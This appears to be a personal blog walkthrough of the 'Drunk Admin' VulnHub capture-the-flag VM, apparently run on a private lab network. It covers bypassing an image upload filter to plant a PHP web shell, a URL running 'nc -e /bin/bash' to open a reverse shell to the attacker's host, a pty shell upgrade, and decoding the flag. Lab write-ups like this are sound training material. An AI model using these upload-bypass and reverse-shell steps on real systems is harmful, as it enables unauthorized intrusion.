Time for another VM ctf challenge, I often find difficulties finding a good boot to root VM, either the image is too slow to download, doesn't work, doesn't connect to the network, blah blah. Often or not, I find myself troubleshooting the VM than pentesting. I was lucky enough to get this challenge working on my vmware workstation. It is mainly an application pentest and was very educational experience. You can d/l the challenge from vulnhub.
1. Firstly, portscan the target. Found only 2 ports open, not much but usually http ports are gold mines! So if you see one, explore it immediately.
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.5p1 Debian 6+squeeze1 (protocol 2.0)
| ssh-hostkey:
| 1024 57:a2:04:3d:6e:e5:01:7b:b4:c6:e5:f9:76:25:8a:8a (DSA)
|_ 2048 66:9a:ee:a2:2a:1a:59:47:b9:c5:50:da:a6:96:76:16 (RSA)
8880/tcp open http Apache httpd 2.2.16 ((Debian))
|_http-server-header: Apache/2.2.16 (Debian)
2. Port 8880 reveals an image upload tool:
3. Explore it a bit to find that it accepts only image files for display and converts it into md5 hash, files are stored in the images directory as you can see from the image property dialog.
4. I tried to upload several canned php files but it got rejected. Fired up burpsuite to explore how the mechanism behind this rejection works, sent requests to the repeater.
5. Seems like we are able to trick it by extending the file twice! But any script (be it php, bash, nc, etc) will get rejected again! Seems like there is some backend code that filters certain key words from my script. Finally found a php code snippet that wasn't filtered, instead of using the usual $_GET statement, I used the $_REQUEST in php.
6. From here, I can pass arguements directly into my php script. I decided to use netcat to reverse back to my host, luckily enough it supported the -e flag, most linux netcats do but not BSDs.
http://192.168.0.152:8880/images/178eaa4e889ab53ce844344ffc945171?cmd=nc%20-e%20/bin/bash%20192.168.0.115%201234
Remember to have a netcat listener on the other end waiting to catch your shell:
# nc -nlvp 1234 listening on [any] 1234 ... connect to [192.168.0.115] from (UNKNOWN) [192.168.0.152] 53197 ls 178eaa4e889ab53ce844344ffc945171.php 1c2ef37a0744cfda7445d3b9fc19a79a.php 1e5608a13dcfe96b1d85a5de98db59d2.png 3208fd203ca8fdfa13bc98a4832c1396.gif 3df5758863d650e59525cf2aa0676230.png 4c68c46f43183b9789860c8a8d6cb5a0.php 72e334fc2377e9bdfa97d50bd4d14120.gif 7cb21b9ceb02fe655f8530fb8fa17338.png 8dc053a3ed0adf03994f96347d20d9e5.png a764b0164c364725dc5b775d88bc6057.png aa63b1c597b45e4f1f883724d0f8dfbe.jpg d38dd53a79f0ce66874082df5a6978df.gif index.html id uid=33(www-data) gid=33(www-data) groups=33(www-data) pwd /var/www/images uname -a Linux drunkadm 2.6.32-5-686 #1 SMP Mon Jan 16 16:04:25 UTC 2012 i686 GNU/Linux
7. I don't like half baked shells, fire up python tty spawn for a better shell, see pentestmonkey one liners.
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@drunkadm:/var/www/images$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
8. Look around the system for the flag. Found a hidden proof.txt file.
www-data@drunkadm:/var/www$ cd /var/www/
cd /var/www/
www-data@drunkadm:/var/www$ ls -al
ls -al
total 48
drwxr-xr-x 4 root root 4096 Apr 2 2012 .
drwxr-xr-x 14 root root 4096 Mar 3 2012 ..
-rw-r--r-- 1 root root 217 Mar 3 2012 .htaccess
-rw-r--r-- 1 root root 322 Mar 6 2012 .proof
-rw-r--r-- 1 root root 2683 Mar 7 2012 image.php
drwxrwxr-x 2 root www-data 4096 Sep 9 18:28 images
-rw-r--r-- 1 root root 1981 Mar 4 2012 index.php
9. This file is a little conversation between bob and someone, there's an encoded text too, looks like base64 encoded.
www-data@drunkadm:/var/www$ cat .proof
cat .proof
#########################
# Drunk Admin Challenge #
# by @anestisb #
#########################
bob> Great work.
bob> Meet me there.
...> ?
bob> What? You don't know where?
bob> Work a little more your post
exploitation skills.
Secret Code:
TGglMUxecjJDSDclN1Ej
Mail me your methods at:
anestis@bechtsoudis.com
10. Lets decode it:
# echo "TGglMUxecjJDSDclN1Ej" | base64 -d Lh%1L^r2CH7%7Q#
11. Poked around bob's home directory to find an encrypt.php page! Insert the decoded msg for the final output:
Alice, prepare for a kinky night. Meet me at '35.517286' '24.017637'
Well, this was a good challenge. Lots of people have solved this puzzle before me. I have to admit, I had some help from their walkthrus but never the less, it was an educational experience for me.
No comments:
Post a Comment